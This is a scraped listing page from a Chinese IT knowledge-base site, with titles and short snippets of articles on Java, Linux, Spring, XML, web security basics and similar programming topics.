                        <div>1、依赖org.apache.pdfboxpdfbox2.0.262、publicStringuploadFile(MultipartFilefile)throwsException{if(file.getContentType().equals(MediaType.APPLICATION_PDF_VALUE)&&FileUtils.containsJavaScript(FileUtils.mul</div>
                    </li>
                    <li><a href="/article/1826500627023360000.htm"
                           title="【web安全】PDF写入XSS攻击" target="_blank">【web安全】PDF写入XSS攻击</a>
                        <span class="text-muted">星盾网安</span>
<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/pdf/1.htm">pdf</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>一开始研究用现成的PDF编辑器工具写入，发现又要VIP，又比较繁琐还不如用Python装一个库，写代码来的快捷所以采用了PyPDF2这个库来写入基础用法在渗透测试中，能触发弹窗就算是一个漏洞了#安装第三方库pipinstallPyPDF2-ihttps://pypi.tuna.tsinghua.edu.cn/simplefromPyPDF2importPdfReader,PdfWriter#新建一</div>
                    </li>
                    <li><a href="/article/1826439118163374080.htm"
                           title="Jenkins 定时触发策略" target="_blank">Jenkins 定时触发策略</a>
                        <span class="text-muted">计算衎</span>
<a class="tag" taget="_blank" href="/search/jenkins/1.htm">jenkins</a><a class="tag" taget="_blank" href="/search/servlet/1.htm">servlet</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>每天晚上11点执行一次，可以按照以下步骤进行。复制代码importjenkinsimportdatetimeimportbase64USERNAME=b'UFNXssaaX0NU\n'PASSWORD=b'UFNXXssdds0Nd'classJenkinsMonitor:def__init__(self,jobs_to_monitor):self.jenkins_url="http://pe-d</div>
                    </li>
                    <li><a href="/article/1826351509265281024.htm"
                           title="Salesforce Community 用户 OAuth 只能通过 web server 或 user-agent flows，而不能通过 username/password" target="_blank">Salesforce Community 用户 OAuth 只能通过 web server 或 user-agent flows，而不能通过 username/password</a>
                        <span class="text-muted">Channing Lewis</span>
<a class="tag" taget="_blank" href="/search/Salesforce/1.htm">Salesforce</a><a class="tag" taget="_blank" href="/search/salesforce/1.htm">salesforce</a>
                        <div>importrequestsinstance_url='https://yourCompanyName.my.site.com'url=f"{instance_url}/services/oauth2/token"payload={'grant_type':'password','client_id':'CLIENT_ID','client_secret':'CLIENT_SECRET','use</div>
                    </li>
                    <li><a href="/article/1772027451875065856.htm"
                           title="网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题" target="_blank">网页有效防止XSS,SQL注入,木马文件拦截上传等安全问题</a>
                        <span class="text-muted">程序员贵哥</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/xss/1.htm">xss</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a>
                        <div>网络安全问题一直是备受关注的话题，其中跨站脚本攻击（XSS）、SQL注入和木马文件上传是常见的安全威胁。下面我将详细介绍这些安全问题。首先是跨站脚本攻击（XSS）。XSS攻击是一种利用网站漏洞，将恶意脚本注入到用户浏览器中并执行的攻击方式。攻击者可以在网站中插入恶意脚本，当用户浏览该网站时，恶意脚本会被执行，从而窃取用户的敏感信息或执行其他恶意操作。XSS攻击可以分为反射型、存储型和DOM-bas</div>
                    </li>
                                <li><a href="/article/43.htm"
                                       title="集合框架" target="_blank">集合框架</a>
                                    <span class="text-muted">天子之骄</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/1.htm">数据结构</a><a class="tag" taget="_blank" href="/search/%E9%9B%86%E5%90%88%E6%A1%86%E6%9E%B6/1.htm">集合框架</a>
                                    <div>&nbsp; &nbsp;集合框架 
集合框架可以理解为一个容器，该容器主要指映射(map)、集合(set)、数组(array)和列表(list)等抽象数据结构。 
从本质上来说，Java集合框架的主要组成是用来操作对象的接口。不同接口描述不同的数据类型。 
&nbsp; 
简单介绍： 
&nbsp; 
Collection接口是最基本的接口，它定义了List和Set，List又定义了LinkLi</div>
                                </li>
                                <li><a href="/article/170.htm"
                                       title="Table Driven（表驱动）方法实例" target="_blank">Table Driven（表驱动）方法实例</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/enum/1.htm">enum</a><a class="tag" taget="_blank" href="/search/Table+Driven/1.htm">Table Driven</a><a class="tag" taget="_blank" href="/search/%E8%A1%A8%E9%A9%B1%E5%8A%A8/1.htm">表驱动</a>
                                    <div>实例一：   
/**
 * 驾驶人年龄段
 * 保险行业，会对驾驶人的年龄做年龄段的区分判断
 * 驾驶人年龄段：01-[18,25);02-[25,30);03-[30-35);04-[35,40);05-[40,45);06-[45,50);07-[50-55);08-[55,+∞)
 */
public class AgePeriodTest {

    //if...el</div>
                                </li>
                                <li><a href="/article/297.htm"
                                       title="Jquery 总结" target="_blank">Jquery 总结</a>
                                    <span class="text-muted">cuishikuan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/Ajax/1.htm">Ajax</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/jquery%E6%96%B9%E6%B3%95/1.htm">jquery方法</a>
                                    <div>1.$.trim方法用于移除字符串头部和尾部多余的空格。如：$.trim('&nbsp;&nbsp; Hello&nbsp;&nbsp; ') // Hello2.$.contains方法返回一个布尔值，表示某个DOM元素（第二个参数）是否为另一个DOM元素（第一个参数）的下级元素。如：$.contains(document.documentElement, document.body); 3.$</div>
                                </li>
                                <li><a href="/article/424.htm"
                                       title="面向对象概念的提出" target="_blank">面向对象概念的提出</a>
                                    <span class="text-muted">麦田的设计者</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E5%90%91%E5%AF%B9%E8%B1%A1/1.htm">面向对象</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E5%90%91%E8%BF%87%E7%A8%8B/1.htm">面向过程</a>
                                    <div>&nbsp;&nbsp; 
&nbsp;&nbsp;&nbsp;&nbsp; 面向对象中，一切都是由对象展开的，组织代码，封装数据。 
&nbsp; 在台湾面向对象被翻译为了面向物件编程，这充分说明了，这种编程强调实体。 
&nbsp; 
&nbsp;&nbsp;&nbsp; 下面就结合编程语言的发展史，聊一聊面向过程和面向对象。 
&nbsp;&nbsp;&nbsp;&nbsp; c语言由贝尔实</div>
                                </li>
                                <li><a href="/article/551.htm"
                                       title="linux网口绑定" target="_blank">linux网口绑定</a>
                                    <span class="text-muted">被触发</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>刚在一台IBM Xserver服务器上装了RedHat Linux Enterprise AS 4，为了提高网络的可靠性配置双网卡绑定。 
 
一、环境描述 
我的RedHat Linux Enterprise AS 4安装双口的Intel千兆网卡，通过ifconfig -a命令看到eth0和eth1两张网卡。 
 
二、双网卡绑定步骤： 
2.1 修改/etc/sysconfig/network</div>
                                </li>
                                <li><a href="/article/678.htm"
                                       title="XML基础语法" target="_blank">XML基础语法</a>
                                    <span class="text-muted">肆无忌惮_</span>
<a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a>
                                    <div>一、什么是XML？ 
XML全称是Extensible Markup Language，可扩展标记语言。很类似HTML。XML的目的是传输数据而非显示数据。XML的标签没有被预定义，你需要自行定义标签。XML被设计为具有自我描述性。是W3C的推荐标准。 
&nbsp; 
二、为什么学习XML？ 
用来解决程序间数据传输的格式问题 
做配置文件 
充当小型数据库 
&nbsp; 
三、XML与HTM</div>
                                </li>
                                <li><a href="/article/805.htm"
                                       title="为网页添加自己喜欢的字体" target="_blank">为网页添加自己喜欢的字体</a>
                                    <span class="text-muted">知了ing</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%97%E4%BD%93+%E7%A7%92%E8%A1%A8+css/1.htm">字体 秒表 css</a>
                                    <div>@font-face {
			font-family: miaobiao;//定义字体名字
			font-style:  normal;
		    font-weight: 400;
			src: url('font/DS-DIGI-e.eot');//字体文件
		} 
使用： 
 
&lt;label style=&quot;font-size:18px;font-famil</div>
                                </li>
                                <li><a href="/article/932.htm"
                                       title="redis范围查询应用-查找IP所在城市" target="_blank">redis范围查询应用-查找IP所在城市</a>
                                    <span class="text-muted">矮蛋蛋</span>
<a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a>
                                    <div>原文地址： 
http://www.tuicool.com/articles/BrURbqV 
需求 
 
根据IP找到对应的城市 
 
原来的解决方案 
 
oracle表（ip_country）： 
 
 
查询IP对应的城市： 
 
1.把a.b.c.d这样格式的IP转为一个数字，例如为把210.21.224.34转为3524648994 
 
2. select city from ip_</div>
                                </li>
                                <li><a href="/article/1059.htm"
                                       title="输入两个整数， 计算百分比" target="_blank">输入两个整数， 计算百分比</a>
                                    <span class="text-muted">alleni123</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>	public static String getPercent(int x, int total){
		 
		double result=(x*1.0)/(total*1.0);
		System.out.println(result);
		
		
		DecimalFormat df1=new DecimalFormat(&quot;0.0000%&quot;);
		
</div>
                                </li>
                                <li><a href="/article/1186.htm"
                                       title="百合——————>怎么学习计算机语言" target="_blank">百合——————>怎么学习计算机语言</a>
                                    <span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/java+%E7%A7%BB%E5%8A%A8%E5%BC%80%E5%8F%91/1.htm">java 移动开发</a>
                                    <div>&nbsp; &nbsp; 对于一个从没有接触过计算机语言的人来说，一上来就学面向对象，就算是心里上面接受的了，灵魂我觉得也应该是跟不上的，学不好是很正常的现象，计算机语言老师讲的再多，你在课堂上面跟着老师听的再多，我觉得你应该还是学不会的，最主要的原因是你根本没有想过该怎么来学习计算机编程语言，记得大一的时候金山网络公司在湖大招聘我们学校一个才来大学几天的被金山网络录取，一个刚到大学的就能够去和</div>
                                </li>
                                <li><a href="/article/1313.htm"
                                       title="linux下tomcat开机自启动" target="_blank">linux下tomcat开机自启动</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/tomcat/1.htm">tomcat</a>
                                    <div>方法一： 
修改Tomcat/bin/startup.sh 为: 
export JAVA_HOME=/home/java1.6.0_27
export CLASSPATH=$CLASSPATH:$JAVA_HOME/lib/tools.jar:$JAVA_HOME/lib/dt.jar:.
export PATH=$JAVA_HOME/bin:$PATH
export CATALINA_H</div>
                                </li>
                                <li><a href="/article/1440.htm"
                                       title="spring aop实例" target="_blank">spring aop实例</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a>
                                    <div>1.AdviceMethods.java 
package com.bijian.study.spring.aop.schema;

public class AdviceMethods {

	public void preGreeting() {
		System.out.println(&quot;--how are you!--&quot;);
	}
} 
2.beans.x</div>
                                </li>
                                <li><a href="/article/1567.htm"
                                       title="[Gson八]GsonBuilder序列化和反序列化选项enableComplexMapKeySerialization" target="_blank">[Gson八]GsonBuilder序列化和反序列化选项enableComplexMapKeySerialization</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/serialization/1.htm">serialization</a>
                                    <div>enableComplexMapKeySerialization配置项的含义 
&nbsp;Gson在序列化Map时，默认情况下，是调用Key的toString方法得到它的JSON字符串的Key，对于简单类型和字符串类型，这没有问题，但是对于复杂数据对象，如果对象没有覆写toString方法，那么默认的toString方法将得到这个对象的Hash地址。 
&nbsp; 
GsonBuilder用于</div>
                                </li>
                                <li><a href="/article/1694.htm"
                                       title="【Spark九十一】Spark Streaming整合Kafka一些值得关注的问题" target="_blank">【Spark九十一】Spark Streaming整合Kafka一些值得关注的问题</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/Stream/1.htm">Stream</a>
                                    <div>包括Spark Streaming在内的实时计算数据可靠性指的是三种级别： 
1. At most once，数据最多只能接受一次，有可能接收不到 
2. At least once, 数据至少接受一次，有可能重复接收 
3. Exactly once&nbsp; 数据保证被处理并且只被处理一次， 
&nbsp; 
具体的多读几遍http://spark.apache.org/docs/lates</div>
                                </li>
                                <li><a href="/article/1821.htm"
                                       title="shell脚本批量检测端口是否被占用脚本" target="_blank">shell脚本批量检测端口是否被占用脚本</a>
                                    <span class="text-muted">ronin47</span>

                                    <div>#!/bin/bash
cat ports   |while read line
do#nc -z  -w 10  $line

nc -z -w 2 $line 58422&gt;/dev/null2&gt;&amp;1if[ $?-eq 0]then
echo $line:ok
else
echo $line:fail
fi

done

这里的ports 既可以是文件</div>
                                </li>
                                <li><a href="/article/1948.htm"
                                       title="java-2.设计包含min函数的栈" target="_blank">java-2.设计包含min函数的栈</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>具体思路参见：http://zhedahht.blog.163.com/blog/static/25411174200712895228171/ 
 

import java.util.ArrayList;
import java.util.List;


public class MinStack {

	//maybe we can use origin array rathe</div>
                                </li>
                                <li><a href="/article/2075.htm"
                                       title="Netty源码学习-ChannelHandler" target="_blank">Netty源码学习-ChannelHandler</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/netty/1.htm">netty</a>
                                    <div> 
一般来说，“有状态”的ChannelHandler不应该是“共享”的，“无状态”的ChannelHandler则可“共享” 
例如ObjectEncoder是“共享”的, 但 ObjectDecoder 不是 
因为每一次调用decode方法时，可能数据未接收完全（incomplete）， 
它与上一次decode时接收到的数据“累计”起来才有可能是完整的数据，是“有状态”的 
 
 

p</div>
                                </li>
                                <li><a href="/article/2202.htm"
                                       title="java生成随机数" target="_blank">java生成随机数</a>
                                    <span class="text-muted">cngolon</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>方法一： 
/** 
* 生成随机数 
* @author cngolon@126.com 
* @return 
*/ 
public synchronized static String getChargeSequenceNum(String pre){ 
StringBuffer sequenceNum = new StringBuffer(); 
Date dateTime = new D</div>
                                </li>
                                <li><a href="/article/2329.htm"
                                       title="POI读写海量数据" target="_blank">POI读写海量数据</a>
                                    <span class="text-muted">ctrain</span>
<a class="tag" taget="_blank" href="/search/%E6%B5%B7%E9%87%8F%E6%95%B0%E6%8D%AE/1.htm">海量数据</a>
                                    <div>import java.io.FileOutputStream; 
import java.io.OutputStream; 
 
import org.apache.poi.xssf.streaming.SXSSFRow; 
import org.apache.poi.xssf.streaming.SXSSFSheet; 
import org.apache.poi.xssf.streaming</div>
                                </li>
                                <li><a href="/article/2456.htm"
                                       title="mysql 日期格式化date_format详细使用" target="_blank">mysql 日期格式化date_format详细使用</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a><a class="tag" taget="_blank" href="/search/date_format/1.htm">date_format</a><a class="tag" taget="_blank" href="/search/%E6%97%A5%E6%9C%9F%E6%A0%BC%E5%BC%8F%E8%BD%AC%E6%8D%A2/1.htm">日期格式转换</a><a class="tag" taget="_blank" href="/search/%E6%97%A5%E6%9C%9F%E6%A0%BC%E5%BC%8F%E5%8C%96/1.htm">日期格式化</a>
                                    <div> 
 日期转换函数的详细使用说明 
  &nbsp;DATE_FORMAT(date,format) Formats the&nbsp;date&nbsp;value according to the&nbsp;format&nbsp;string. The following specifiers may be used in the&nbsp;format&nbsp;string. The&n</div>
                                </li>
                                <li><a href="/article/2583.htm"
                                       title="一个程序员分享8年的开发经验" target="_blank">一个程序员分享8年的开发经验</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/%E7%A8%8B%E5%BA%8F%E5%91%98/1.htm">程序员</a>
                                    <div>&nbsp; 
在中国有很多人都认为IT行为是吃青春饭的，如果过了30岁就很难有机会再发展下去!其实现实并不是这样子的，在下从事.NET及JAVA方面的开发的也有8年的时间了，在这里在下想凭借自己的亲身经历，与大家一起探讨一下。 
明确入行的目的 
很多人干IT这一行都冲着“收入高”这一点的，因为只要学会一点HTML, DIV+CSS，要做一个页面开发人员并不是一件难事，而且做一个页面开发人员更容</div>
                                </li>
                                <li><a href="/article/2710.htm"
                                       title="android欢迎界面淡入淡出效果" target="_blank">android欢迎界面淡入淡出效果</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>很多Android应用一开始都会有一个欢迎界面，淡入淡出效果也是用得非常多的，下面来实现一下。 
主要代码如下： 
package com.myaibang.activity; 
import android.app.Activity;import android.content.Intent;import android.os.Bundle;import android.os.CountDown</div>
                                </li>
                                <li><a href="/article/2837.htm"
                                       title="linux 复习笔记之常见压缩命令" target="_blank">linux 复习笔记之常见压缩命令</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/tar%E8%A7%A3%E5%8E%8B/1.htm">tar解压</a><a class="tag" taget="_blank" href="/search/linux%E7%B3%BB%E7%BB%9F%E5%B8%B8%E8%A7%81%E5%8E%8B%E7%BC%A9%E5%91%BD%E4%BB%A4/1.htm">linux系统常见压缩命令</a><a class="tag" taget="_blank" href="/search/linux%E5%8E%8B%E7%BC%A9%E5%91%BD%E4%BB%A4/1.htm">linux压缩命令</a><a class="tag" taget="_blank" href="/search/tar%E5%8E%8B%E7%BC%A9/1.htm">tar压缩</a>
                                    <div>转载请出自出处:http://eksliang.iteye.com/blog/2109693 
linux中常见压缩文件的拓展名 
*.gz   gzip程序压缩的文件
*.bz2  bzip程序压缩的文件
*.tar  tar程序打包的数据，没有经过压缩
*.tar.gz  tar程序打包后，并经过gzip程序压缩
*.tar.bz2 tar程序打包后，并经过bzip程序压缩
*.zi</div>
                                </li>
                                <li><a href="/article/2964.htm"
                                       title="Android 应用程序发送shell命令" target="_blank">Android 应用程序发送shell命令</a>
                                    <span class="text-muted">gqdy365</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>项目中需要直接在APP中通过发送shell指令来控制lcd灯，其实按理说应该是方案公司在调好lcd灯驱动之后直接通过service送接口上来给APP，APP调用就可以控制了，这是正规流程，但我们项目的方案商用的mtk方案，方案公司又没人会改，只调好了驱动，让应用程序自己实现灯的控制，这不蛋疼嘛！！！！ 
 
发就发吧！ 
 
一、关于shell指令： 
我们知道，shell指令是Linux里面带的</div>
                                </li>
                                <li><a href="/article/3091.htm"
                                       title="java 无损读取文本文件" target="_blank">java 无损读取文本文件</a>
                                    <span class="text-muted">hw1287789687</span>
<a class="tag" taget="_blank" href="/search/%E8%AF%BB%E5%8F%96%E6%96%87%E4%BB%B6/1.htm">读取文件</a><a class="tag" taget="_blank" href="/search/%E6%97%A0%E6%8D%9F%E8%AF%BB%E5%8F%96/1.htm">无损读取</a><a class="tag" taget="_blank" href="/search/%E8%AF%BB%E5%8F%96%E6%96%87%E6%9C%AC%E6%96%87%E4%BB%B6/1.htm">读取文本文件</a><a class="tag" taget="_blank" href="/search/charset/1.htm">charset</a>
                                    <div>java 如何无损读取文本文件呢？ 
以下是有损的 
@Deprecated
	public static String getFullContent(File file, String charset) {
		BufferedReader reader = null;
		if (!file.exists()) {
			System.out.println(&quot;getFull</div>
                                </li>
                                <li><a href="/article/3218.htm"
                                       title="Firebase 相关文章索引" target="_blank">Firebase 相关文章索引</a>
                                    <span class="text-muted">justjavac</span>
<a class="tag" taget="_blank" href="/search/firebase/1.htm">firebase</a>
                                    <div>Awesome Firebase 
最近谷歌收购Firebase的新闻又将Firebase拉入了人们的视野，于是我做了这个 github 项目。 
Firebase 是一个数据同步的云服务，不同于 Dropbox 的「文件」，Firebase 同步的是「数据」，服务对象是网站开发者，帮助他们开发具有「实时」（Real-Time）特性的应用。 
开发者只需引用一个 API 库文件就可以使用标准 RE</div>
                                </li>
                                <li><a href="/article/3345.htm"
                                       title="C++学习重点" target="_blank">C++学习重点</a>
                                    <span class="text-muted">lx.asymmetric</span>
<a class="tag" taget="_blank" href="/search/C%2B%2B/1.htm">C++</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                                    <div>1.c++面向对象的三个特性：封装性，继承性以及多态性。 
&nbsp; 
2.标识符的命名规则：由字母和下划线开头，同时由字母、数字或下划线组成；不能与系统关键字重名。 
&nbsp; 
3.c++语言常量包括整型常量、浮点型常量、布尔常量、字符型常量和字符串性常量。 
&nbsp; 
4.运算符按其功能开以分为六类：算术运算符、位运算符、关系运算符、逻辑运算符、赋值运算符和条件运算符。 
&n</div>
                                </li>
                                <li><a href="/article/3472.htm"
                                       title="java bean和xml相互转换" target="_blank">java bean和xml相互转换</a>
                                    <span class="text-muted">q821424508</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/bean/1.htm">bean</a><a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a><a class="tag" taget="_blank" href="/search/xml%E5%92%8Cbean%E8%BD%AC%E6%8D%A2/1.htm">xml和bean转换</a><a class="tag" taget="_blank" href="/search/java+bean%E5%92%8Cxml%E8%BD%AC%E6%8D%A2/1.htm">java bean和xml转换</a>
                                    <div>这几天在做微信公众号 
做的过程中想找个java bean转xml的工具，找了几个用着不知道是配置不好还是怎么回事，都会有一些问题， 
然后脑子一热谢了一个javabean和xml的转换的工具里，自己用着还行，虽然有一些约束吧 ， 
还是贴出来记录一下&nbsp; 
&nbsp; 
&nbsp; 
顺便你提一下下，这个转换工具支持属性为集合、数组和非基本属性的对象。 
&nbsp; 
packag</div>
                                </li>
                                <li><a href="/article/3599.htm"
                                       title="C 语言初级 位运算" target="_blank">C 语言初级 位运算</a>
                                    <span class="text-muted">1140566087</span>
<a class="tag" taget="_blank" href="/search/%E4%BD%8D%E8%BF%90%E7%AE%97/1.htm">位运算</a><a class="tag" taget="_blank" href="/search/c/1.htm">c</a>
                                    <div>  第十章 位运算  &nbsp; 1、位运算对象只能是整形或字符型数据，在VC6.0中int型数据占4个字节  &nbsp; 2、位运算符：  运算符 作用  ~ 按位求反  &lt;&lt; 左移  &gt;&gt; 右移  &amp; 按位与  ^ 按位异或  | 按位或   他们的优先级从高到低；  &nbsp; 3、位运算符的运算功能：  a、按位取反：  ~01001101 = 101</div>
                                </li>
                                <li><a href="/article/3726.htm"
                                       title="14点睛Spring4.1-脚本编程" target="_blank">14点睛Spring4.1-脚本编程</a>
                                    <span class="text-muted">wiselyman</span>
<a class="tag" taget="_blank" href="/search/spring4/1.htm">spring4</a>
                                    <div>14.1 Scripting脚本编程 
 
 脚本语言和java这类静态的语言的主要区别是:脚本语言无需编译,源码直接可运行; 
 如果我们经常需要修改的某些代码,每一次我们至少要进行编译,打包,重新部署的操作,步骤相当麻烦; 
 如果我们的应用不允许重启,这在现实的情况中也是很常见的; 
 在spring中使用脚本编程给上述的应用场景提供了解决方案,即动态加载bean; 
 spring支持脚本</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>